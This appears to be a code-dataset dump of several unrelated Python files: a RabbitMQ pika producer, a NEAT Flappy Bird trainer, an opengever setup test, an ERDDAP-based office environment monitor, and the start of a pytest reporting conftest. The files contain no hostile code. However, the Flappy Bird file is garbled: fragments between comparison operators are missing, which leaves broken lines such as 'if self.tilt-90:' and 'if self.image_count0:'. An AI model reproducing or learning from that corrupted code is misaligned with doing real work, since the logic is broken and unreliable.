type=str,\n help='RabbitMQ password', default=\"guest\")\n parser.add_option('', '--vhost', dest='vhost', type=str,\n help='RabbitMQ vhost', default=\"/\")\n parser.add_option('-q', '--queue', dest='queue', type=str,\n help='Name of queue to publish to', default=\"test-input\")\n parser.add_option('', '--log_level',dest='log_level',type=str,\n help='Logging level for pikaprocess logger', default=\"INFO\")\n \n \ndef pika_producer_from_opts(opts):\n log.setLevel(opts.log_level.upper())\n logging.getLogger(\"pika\").setLevel(\"WARN\")\n producer = PikaProducer(opts.host, opts.port,\n opts.user, opts.password,\n opts.vhost,\n {\"queue\":opts.queue, \"durable\": True, \"arguments\":{\"x-max-priority\":10}})\n return producer\n\ndef pika_process_from_opts(opts):\n log.setLevel(opts.log_level.upper())\n logging.getLogger(\"pika\").setLevel(\"WARN\")\n process = PikaProcess(opts.host, opts.port,\n opts.user, opts.password,\n opts.vhost,\n {\"queue\":opts.input_queue, \"durable\": True, \"arguments\":{\"x-max-priority\":10}},\n {\"queue\":opts.success_queue, \"durable\": True, \"arguments\":{\"x-max-priority\":10}},\n {\"queue\":opts.fail_queue, \"durable\": True, \"arguments\":{\"x-max-priority\":10}},\n opts.sleep_time)\n return process\n\ndef test_process(pika_process):\n \"\"\"\n The point of this test is to simulate a long running handler.\n Upon receipt of a SIGINT (Ctrl-C) or SIGTERM the pika_process\n should push the current message back to the queue.\n \"\"\"\n def handler(message):\n log.info(\"Handler received message: {}\".format(message))\n time.sleep(1000000)\n pika_process.process(handler)\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n parser = OptionParser()\n #add_pika_process_opts(parser)\n add_pika_producer_opts(parser)\n opts,args = parser.parse_args()\n #process = pika_process_from_opts(opts)\n #test(process)\n producer = pika_producer_from_opts(opts)\n producer.publish([\"these are a\",\"few messages\"])\n\n\n\n \n", "sub_path": "pika_process.py", "file_name": "pika_process.py", "file_ext": "py", "file_size_in_byte": 10219, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 9, "usage_type": "call"}, {"api_name": "pika.PlainCredentials", "line_number": 16, "usage_type": "call"}, {"api_name": "pika.ConnectionParameters", "line_number": 17, "usage_type": "call"}, {"api_name": "pika.BlockingConnection", "line_number": 25, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 51, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 51, "usage_type": "attribute"}, {"api_name": "signal.signal", "line_number": 52, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 60, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 74, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 79, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 91, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 146, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 150, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 171, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 180, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 198, "usage_type": "call"}, {"api_name": "optparse.OptionParser", "line_number": 204, "usage_type": "call"}]} +{"seq_id": "552648685", "text": "import pygame\nfrom pygame.mask import from_surface\nimport neat\nimport time\nimport os\nimport random\npygame.font.init()\n\n#loading images and setting thee screen\nWIN_WIDTH=500\nWIN_HEIGHT=800\n\n# for the generation\nGEN=0\n\nBIRD_IMAGES=[pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"bird1.png\"))),\n pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"bird2.png\"))),\n pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"bird3.png\")))]\n\nPIPE_IMAGE=pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"pipe.png\")))\nBASE_IMAGE=pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"base.png\")))\nBG_IMAGE=pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"bg.png\")))\n\n# loading the fonts\nSTAT_FONT=pygame.font.SysFont(\"comicsans\",50)\n\nDRAW_LINES=True\n\nclass Bird:\n IMGS=BIRD_IMAGES\n # when we want to tilt the bird up and down it nose pointing that way.\n MAX_ROTATION=25\n # rotingn frames each time we want to move teh bird\n ROT_VEL=20\n # how long we show each bird animation\n ANIMATION_TIME=5\n def __init__(self,x,y):\n #def __int__(self,x,y):\n self.x=x\n self.y=y\n # deciding how much the image is tilting\n self.tilt=0\n # Deciding the physics of our bird when we jump or we g down\n self.tick_count=0\n # our velocity\n self.vel=0\n # deciding the height of the bord\n self.height=self.y\n # deciding the amount of images of the bird being displayed\n self.image_count=0\n # setting the initial image of the bird as the first one.\n self.img=self.IMGS[0]\n\n # setting a function which will be useful when we will jump\n def jump(self):\n # the inital velocity for our bird which will be ini upwards direction\n self.vel = -10.5\n # deciding how many times the bird will jump.Initial will be zero\n self.tick_count=0\n # initial height for the bird jump\n self.height=self.y\n\n #calling this method to move the frames in our game\n def move(self):\n # a tick happend and we jumped once\n self.tick_count+=1\n # displacement, this will be the distance our bird will be moving with each jump.\n # This will keep decreasing with each jump.\n d=self.vel*(self.tick_count)+1.5*self.tick_count**2\n\n # limiting thee move down vel to 16 if it is more.\n if d>=16:\n d=16\n\n # setting the jump up vel to be more than we get from above\n if d<0:\n d-=2\n\n # setting the y post of the bord.\n self.y=self.y+d\n\n # checking if we are moving above and tilting\n # the bird only when it has stopped moving up and begun to retrace back down.\n if d<0 or (self.y<(self.height+50)):\n\n # making sure the bird is not tilted the wrong way.\n # also checking where to tilt the bird (up or down)\n if self.tilt-90:\n self.tilt=self.ROT_VEL\n\n # win represents the window on which we draw the bord.\n def draw(self,win):\n # tracking how many times we have shown the image.\n self.image_count+=1\n\n # checking what image of the bord to be shown at what time\n if self.image_count0:\n if len(pipes)>1 and birds[0].x > pipes[0].PIPE_TOP.get_width():\n pipe_ind=1\n else:\n run=False\n break\n\n # for moving the birds\n # we will pass the inputs to Nn which will check the outputs\n # and if the output is greater that 0.5 make the bird jump\n for x, bird in enumerate(birds):\n bird.move()\n # providing the fitness value less as this loop will run 30\n # times a second and if more value is there bird will touch the top screen\n ge[x].fitness+=0.1\n\n # send bird location, top pipe location and bottom pipe location and\n # determine from network whether to jump or not\n output = nets[x].activate(\n (bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))\n # making the bird jump\n if output[0]>0.5:\n bird.jump()\n # moving the bird\n #bird.move()\n\n # used for drawing pipes on the screen\n add_pipe=False\n # list which will contain the removed pipes\n rem=[]\n for pipe in pipes:\n for x,bird in enumerate(birds):\n # checking for the collision\n if pipe.collide(bird):\n # if a bird hit a pipe then its fitness level will be decreased\n ge[x].fitness-=1\n birds.pop(x)\n nets.pop(x)\n ge.pop(x)\n\n # used for drawing another pipe on the screen\n if not pipe.passed and pipe.x=730 or bird.y<0:\n birds.pop(x)\n nets.pop(x)\n ge.pop(x)\n\n # moving the base\n base.move()\n\n # drawing the bird\n draw_window(win,birds,pipes,base,score,GEN,pipe_ind)\n\n\n\n\n\n# inputs for the algorithm will be bird y posi, top pipe, bottom pipe\n# outputs will be jump or not\n# activation function will be tan(h)\n# initial no. of neurons or bird which will be starting in the beginning.\n# fitness function:- evaluating how the birds are, the bird who reach the farthest scores the best.\n# max generation means the maximum value for which we will try before terminating and trying again.\n\ndef run(config_path):\n config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_path)\n # we have specified the things which wehave mentioned in our config file.\n\n p = neat.Population(config)\n # generation the population\n\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n # this will give ous some stats about the fitness and stuff\n\n winner=p.run(main,50)\n # 50 defines the generations which we want to run.\n # this is the fitness function which we will be specifying\n\n\n\n # show final stats\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n\nif __name__==\"__main__\":\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward.txt')\n run(config_path)", "sub_path": "neat-fb-auton.py", "file_name": "neat-fb-auton.py", "file_ext": "py", "file_size_in_byte": 13902, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.font.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 122, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 132, "usage_type": "call"}, {"api_name": "pygame.transform.flip", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 148, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 158, "usage_type": "call"}, {"api_name": "pygame.mask.from_surface", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.mask.from_surface", "line_number": 177, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 248, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 248, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 252, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 252, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 260, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 260, "usage_type": "attribute"}, {"api_name": "neat.nn.FeedForwardNetwork.create", "line_number": 276, "usage_type": "call"}, {"api_name": "neat.nn", "line_number": 276, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 286, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 286, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 299, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 299, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 303, "usage_type": "call"}, {"api_name": "neat.config.Config", "line_number": 397, "usage_type": "call"}, {"api_name": "neat.config", "line_number": 397, "usage_type": "attribute"}, {"api_name": "neat.DefaultGenome", "line_number": 397, "usage_type": "attribute"}, {"api_name": "neat.DefaultReproduction", "line_number": 397, "usage_type": "attribute"}, {"api_name": "neat.DefaultSpeciesSet", "line_number": 398, "usage_type": "attribute"}, {"api_name": "neat.DefaultStagnation", "line_number": 398, "usage_type": "attribute"}, {"api_name": "neat.Population", "line_number": 402, "usage_type": "call"}, {"api_name": "neat.StdOutReporter", "line_number": 405, "usage_type": "call"}, {"api_name": "neat.StatisticsReporter", "line_number": 406, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 421, "usage_type": "call"}, {"api_name": "os.path", "line_number": 421, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 422, "usage_type": "call"}, {"api_name": "os.path", "line_number": 422, "usage_type": "attribute"}]} +{"seq_id": "183402556", "text": "from ftw.builder import Builder\nfrom ftw.builder import create\nfrom opengever.base.model import create_session\nfrom opengever.ogds.models.service import ogds_service\nfrom opengever.setup.creation.adminunit import AdminUnitCreator\nfrom opengever.setup.creation.orgunit import OrgUnitCreator\nfrom opengever.testing import FunctionalTestCase\nfrom plone.app.testing import applyProfile\nfrom StringIO import StringIO\nimport json\n\n\nclass TestUnitCreation(FunctionalTestCase):\n\n use_default_fixture = False\n\n def setUp(self):\n super(TestUnitCreation, self).setUp()\n create(Builder('ogds_group').id('users'))\n applyProfile(self.portal, 'opengever.setup.tests:units')\n self.session = create_session()\n\n self.au_data = StringIO(json.dumps([{\n 'unit_id': 'admin',\n 'title': 'AdminUnit',\n 'ip_address': '127.0.0.1',\n 'site_url': 'http://admin.local',\n 'public_url': 'http://admin.local',\n 'abbreviation': 'A',\n }]))\n\n self.ou_data = StringIO(json.dumps([{\n 'unit_id': 'org',\n 'title': 'OrgUnit',\n 'admin_unit_id': 'admin',\n 'users_group_id': 'users',\n 'inbox_group_id': 'users',\n\n }]))\n\n def test_admin_unit_created(self):\n self.assertEqual(1, len(ogds_service().all_admin_units()))\n admin_unit = ogds_service().fetch_admin_unit('admin')\n self.assertIsNotNone(admin_unit)\n\n def test_org_unit_created(self):\n self.assertEqual(1, len(ogds_service().all_org_units()))\n org_unit = ogds_service().fetch_org_unit('org')\n self.assertIsNotNone(org_unit)\n self.assertIsNotNone(org_unit.admin_unit)\n self.assertIsNotNone(org_unit.users_group)\n self.assertIsNotNone(org_unit.inbox_group)\n\n def test_allows_skipping_of_already_existing_units(self):\n au_creator = AdminUnitCreator(skip_if_exists=True)\n au_creator.run(self.au_data)\n self.session.flush()\n\n ou_creator = OrgUnitCreator(skip_if_exists=True)\n ou_creator.run(self.ou_data)\n self.session.flush()\n", "sub_path": "opengever/setup/tests/test_creation.py", "file_name": "test_creation.py", "file_ext": "py", "file_size_in_byte": 2129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "opengever.testing.FunctionalTestCase", "line_number": 13, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 19, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 19, "usage_type": "call"}, {"api_name": "plone.app.testing.applyProfile", "line_number": 20, "usage_type": "call"}, {"api_name": "opengever.base.model.create_session", "line_number": 21, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 23, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "opengever.ogds.models.service.ogds_service", "line_number": 42, "usage_type": "call"}, {"api_name": "opengever.ogds.models.service.ogds_service", "line_number": 43, "usage_type": "call"}, {"api_name": "opengever.ogds.models.service.ogds_service", "line_number": 47, "usage_type": "call"}, {"api_name": "opengever.ogds.models.service.ogds_service", "line_number": 48, "usage_type": "call"}, {"api_name": "opengever.setup.creation.adminunit.AdminUnitCreator", "line_number": 55, "usage_type": "call"}, {"api_name": "opengever.setup.creation.orgunit.OrgUnitCreator", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "269572193", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# ### Bits and pieces for Lab Env Monitor\n# \n# *output in jsonp - last measurement*\n\n# In[183]:\n\n\nimport json\nfrom erddapy import ERDDAP\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport urllib.request\n\ntoday = datetime.datetime.utcnow().strftime('%Y-%m-%dT00:00:00Z')\nyesterday = (datetime.datetime.utcnow()-datetime.timedelta(days=1)).strftime('%Y-%m-%dT00:00:00Z')\n\nserver_url = 'http://downdraft.pmel.noaa.gov:8080/erddap'\nrequest_url = '/tabledap/OfficeRedboard_WxStation.jsonlKVP?time%2Ctemperature%2CRH_Percent%2CSLP%2CAltitude%2CUVA%2CUVB%2CUVindex&time%3E=2020-02-26T00%3A00%3A00Z&orderByMax(%22time%22)'\n\njsonout = json.loads(urllib.request.urlopen(server_url+request_url).read())\n\n\n# In[184]:\n\n\njsonout.update({'datetime':datetime.datetime.strptime(jsonout['time'],\n '%Y-%m-%dT%H:%M:%SZ').timestamp()})\njsonout.update({ \"messages\": \"What sort of message would be helpful.\"})\njsonout.update({ \"days\": datetime.datetime.utcnow().day})\n\n\n# In[185]:\n\n\nd = ERDDAP(server=server_url,\n protocol='tabledap',\n response='csv'\n)\nd.dataset_id='OfficeRedboard_WxStation'\n\nd.constraints={'time>=': datetime.datetime.now()-datetime.timedelta(hours=3)}\njsonout.update({\"messages\":\"trends calculated using last 3hrs, red is greater than 1 std change, blue is greater than -1std change\"})\n\ntry:\n df = d.to_pandas(\n\n index_col='time (UTC)',\n parse_dates=True,\n skiprows=(1,) # units information can be dropped.\n )\n\n df.sort_index(inplace=True)\n df.columns = [x[1].split()[0] for x in enumerate(df.columns)]\n df_mean=df.mean()\n\n #temperature\n if (jsonout['temperature'] < (df.mean()['temperature']-df.std()['temperature']) ):\n jsonout.update({\"tempAlert\": \"alert alert-info\"})\n elif (jsonout['temperature'] > (df.mean()['temperature']+df.std()['temperature']) ):\n jsonout.update({\"tempAlert\": \"alert alert-danger\"})\n\n #moisture\n if (jsonout['RH_Percent'] < (df.mean()['RH_Percent']-df.std()['RH_Percent']) ):\n jsonout.update({\"moistAlert\": \"alert alert-info\"})\n elif (jsonout['RH_Percent'] > (df.mean()['RH_Percent']+df.std()['RH_Percent']) ):\n jsonout.update({\"moistAlert\": \"alert alert-danger\"}) \n #pressure\n if (jsonout['SLP'] < (df.mean()['SLP']-df.std()['SLP']) ):\n jsonout.update({\"pressAlert\": \"alert alert-info\"})\n elif (jsonout['SLP'] > (df.mean()['SLP']+df.std()['SLP']) ):\n jsonout.update({\"pressAlert\": \"alert alert-danger\"}) \n #UVA\n if (jsonout['UVA'] < (df.mean()['UVA']-df.std()['UVA']) ):\n jsonout.update({\"UVAAlert\": \"alert alert-info\"})\n elif (jsonout['UVA'] > (df.mean()['UVA']+df.std()['UVA']) ):\n jsonout.update({\"UVAAlert\": \"alert alert-danger\"}) \n #UVB\n if (jsonout['UVB'] < (df.mean()['UVB']-df.std()['UVB']) ):\n jsonout.update({\"UVBAlert\": \"alert alert-info\"})\n elif (jsonout['UVB'] > (df.mean()['UVB']+df.std()['UVB']) ):\n jsonout.update({\"UVBAlert\": \"alert alert-danger\"}) \n #UVindex\n if (jsonout['UVindex'] < (df.mean()['UVindex']-df.std()['UVindex']) ):\n jsonout.update({\"UVindexAlert\": \"alert alert-info\"})\n elif (jsonout['UVindex'] > (df.mean()['UVindex']+df.std()['UVindex']) ):\n jsonout.update({\"UVindexAlert\": \"alert alert-danger\"}) \n\nexcept:\n jsonout.update({\"messages\":\"no data in 3hr window to calculate trends\",\n \"tempAlert\": \"alert alert-warning\",\n \"pressAlert\": \"alert alert-warning\",\n \"moistAlert\": \"alert alert-warning\",\n \"UVAAlert\": \"alert alert-warning\",\n \"UVBAlert\": \"alert alert-warning\",\n \"UVindexAlert\": \"alert alert-warning\"})\n\n\n# In[186]:\n\n\nwith open('OfficeEnvMonitor.json', 'w') as my_data_file:\n my_data_file.write(json.dumps(jsonout,indent=0))\n\n\n# In[ ]:\n\n\n\n\n", "sub_path": "swbell/ThingSpeak_Wx/python_src/OfficeEnvMonitor.py", "file_name": "OfficeEnvMonitor.py", "file_ext": "py", "file_size_in_byte": 4017, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 24, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "erddapy.ERDDAP", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "435868077", "text": "import pytest\nimport os\nimport zipfile\nimport json\nimport tempfile\nimport yaml\nimport csv\nimport datetime\nimport hashlib\nimport io\nimport json\nimport os\nimport re\nimport time\n\nfrom boltons import funcutils\n\ntry:\n from html import escape\nexcept ImportError:\n from cgi import escape\nfrom collections import defaultdict\n\nimport docutils.core\nimport jinja2\nimport xlsxwriter\nfrom six import string_types\n\n# noinspection PyUnresolvedReferences\nimport version\nimport logging\n\n\nhelm_packages_list = []\npackage_dir = \"\"\n\noptional_tests_settings = {}\n\n\nlogging.basicConfig(format=\"%(levelname)s:%(message)s\", level=logging.ERROR)\n\n__path__ = [os.path.dirname(os.path.abspath(__file__))]\n\nDEFAULT_OUTPUT_DIR = \"{}/../output\".format(__path__[0])\n\nCNF_REQUIREMENTS_FILE = os.path.join(__path__[0], \"..\", \"cnf_requirements.json\")\n\n\ndef get_output_dir(config):\n \"\"\"\n Retrieve the output directory for the reports and create it if necessary\n :param config: pytest configuration\n :return: output directory as string\n \"\"\"\n output_dir = config.option.output_dir or DEFAULT_OUTPUT_DIR\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, exist_ok=True)\n return output_dir\n\n\nREPORT_COLUMNS = [\n (\"Error #\", \"err_num\"),\n (\"Input File\", \"file\"),\n (\"Requirements\", \"req_description\"),\n (\"Error Message\", \"message\"),\n (\"Test\", \"test_file\"),\n]\n\nCOLLECTION_FAILURE_WARNING = \"\"\"WARNING: The following unexpected errors occurred\nwhile preparing to validate the the input files. Some validations may not have been\nexecuted. Please refer these issue to the VNF Validation Tool team.\n\"\"\"\n\nCOLLECTION_FAILURES = []\n\n# Captures the results of every test run\nALL_RESULTS = []\n\n\ndef validates(*requirement_ids):\n \"\"\"Decorator that tags the test function with one or more requirement IDs.\n\n Example:\n >>> @validates('R-12345', 'R-12346')\n ... def test_something():\n ... pass\n >>> assert test_something.requirement_ids == ['R-12345', 'R-12346']\n \"\"\"\n # pylint: disable=missing-docstring\n def decorator(func):\n # NOTE: We use a utility here to ensure that function signatures are\n # maintained because pytest inspects function signatures to inject\n # fixtures. I experimented with a few options, but this is the only\n # library that worked. Other libraries dynamically generated a\n # function at run-time, and then lost the requirement_ids attribute\n @funcutils.wraps(func)\n def wrapper(*args, **kw):\n return func(*args, **kw)\n\n wrapper.requirement_ids = requirement_ids\n return wrapper\n\n decorator.requirement_ids = requirement_ids\n return decorator\n\n\ndef extract_error_msg(rep):\n \"\"\"\n If a custom error message was provided, then extract it otherwise\n just show the pytest assert message\n \"\"\"\n if rep.outcome != \"failed\":\n return \"\"\n try:\n full_msg = str(rep.longrepr.reprcrash.message)\n match = re.match(\n \"AssertionError:(.*)^assert.*\", full_msg, re.MULTILINE | re.DOTALL\n )\n if match: # custom message was provided\n # Extract everything between AssertionError and the start\n # of the assert statement expansion in the pytest report\n msg = match.group(1)\n elif \"AssertionError:\" in full_msg:\n msg = full_msg.split(\"AssertionError:\")[1]\n else:\n msg = full_msg\n except AttributeError:\n msg = str(rep)\n\n return msg\n\n\nclass TestResult:\n \"\"\"\n Wraps the test case and result to extract necessary metadata for\n reporting purposes.\n \"\"\"\n\n RESULT_MAPPING = {\"passed\": \"PASS\", \"failed\": \"FAIL\", \"skipped\": \"SKIP\"}\n\n def __init__(self, item, outcome):\n self.item = item\n self.result = outcome.get_result()\n self.files = self._get_files()\n self.error_message = self._get_error_message()\n\n @property\n def requirement_ids(self):\n \"\"\"\n Returns list of requirement IDs mapped to the test case.\n\n :return: Returns a list of string requirement IDs the test was\n annotated with ``validates`` otherwise returns and empty list\n \"\"\"\n is_mapped = hasattr(self.item.function, \"requirement_ids\")\n return self.item.function.requirement_ids if is_mapped else []\n\n @property\n def markers(self):\n \"\"\"\n :return: Returns a set of pytest marker names for the test or an empty set\n \"\"\"\n return set(m.name for m in self.item.iter_markers())\n\n @property\n def is_base_test(self):\n \"\"\"\n :return: Returns True if the test is annotated with a pytest marker called base\n \"\"\"\n return \"base\" in self.markers\n\n @property\n def is_failed(self):\n \"\"\"\n :return: True if the test failed\n \"\"\"\n return self.outcome == \"FAIL\"\n\n @property\n def outcome(self):\n \"\"\"\n :return: Returns 'PASS', 'FAIL', or 'SKIP'\n \"\"\"\n return self.RESULT_MAPPING[self.result.outcome]\n\n @property\n def test_case(self):\n \"\"\"\n :return: Name of the test case method\n \"\"\"\n return self.item.function.__name__\n\n @property\n def test_module(self):\n \"\"\"\n :return: Name of the file containing the test case\n \"\"\"\n return self.item.function.__module__.split(\".\")[-1]\n\n @property\n def test_id(self):\n \"\"\"\n :return: ID of the test (test_module + test_case)\n \"\"\"\n return \"{}::{}\".format(self.test_module, self.test_case)\n\n @property\n def raw_output(self):\n \"\"\"\n :return: Full output from pytest for the given test case\n \"\"\"\n return str(self.result.longrepr)\n\n def requirement_text(self, curr_reqs):\n \"\"\"\n Creates a text summary for the requirement IDs mapped to the test case.\n If no requirements are mapped, then it returns the empty string.\n\n :param curr_reqs: mapping of requirement IDs to requirement metadata\n loaded from the VNFRQTS projects needs.json output.\n Right now the metadata is loaded from a custom json file with dummy IDs as VNFRQTS is only for VNFs.\n :return: ID and text of the requirements mapped to the test case\n \"\"\"\n text = (\n \"\\n\\n{}: \\n{}\".format(r_id, curr_reqs[r_id][\"description\"])\n for r_id in self.requirement_ids\n if r_id in curr_reqs\n )\n return \"\".join(text)\n\n def requirements_metadata(self, curr_reqs):\n \"\"\"\n Returns a list of dicts containing the following metadata for each\n requirement mapped:\n\n - id: Requirement ID\n - text: Full text of the requirement\n - keyword: MUST, MUST NOT, MAY, etc.\n\n :param curr_reqs: mapping of requirement IDs to requirement metadata\n loaded from the VNFRQTS projects needs.json output\n Right now the metadata is loaded from a custom json file with dummy IDs as VNFRQTS is only for VNFs.\n :return: List of requirement metadata\n \"\"\"\n data = []\n for r_id in self.requirement_ids:\n if r_id not in curr_reqs:\n continue\n data.append(\n {\n \"id\": r_id,\n \"text\": curr_reqs[r_id][\"description\"],\n \"keyword\": curr_reqs[r_id][\"keyword\"],\n }\n )\n return data\n\n def _get_files(self):\n \"\"\"\n Extracts the list of files passed into the test case.\n :return: List of absolute paths to files\n \"\"\"\n parts = self.result.nodeid.split(\"[\")\n return [\"\"] if len(parts) == 1 else [os.path.basename(parts[1][:-1])]\n\n def _get_error_message(self):\n \"\"\"\n :return: Error message or empty string if the test did not fail or error\n \"\"\"\n if self.is_failed:\n return extract_error_msg(self.result)\n else:\n return \"\"\n\n\n# noinspection PyUnusedLocal\n@pytest.hookimpl(tryfirst=True, hookwrapper=True)\ndef pytest_runtest_makereport(item, call):\n \"\"\"\n Captures the test results for later reporting. This will also halt testing\n if a base failure is encountered (can be overridden with continue-on-failure)\n \"\"\"\n outcome = yield\n if outcome.get_result().when != \"call\":\n return # only capture results of test cases themselves\n result = TestResult(item, outcome)\n\n ALL_RESULTS.append(result)\n\n\ndef make_timestamp():\n \"\"\"\n :return: String make_iso_timestamp in format:\n 2019-01-19 10:18:49.865000 Central Standard Time\n 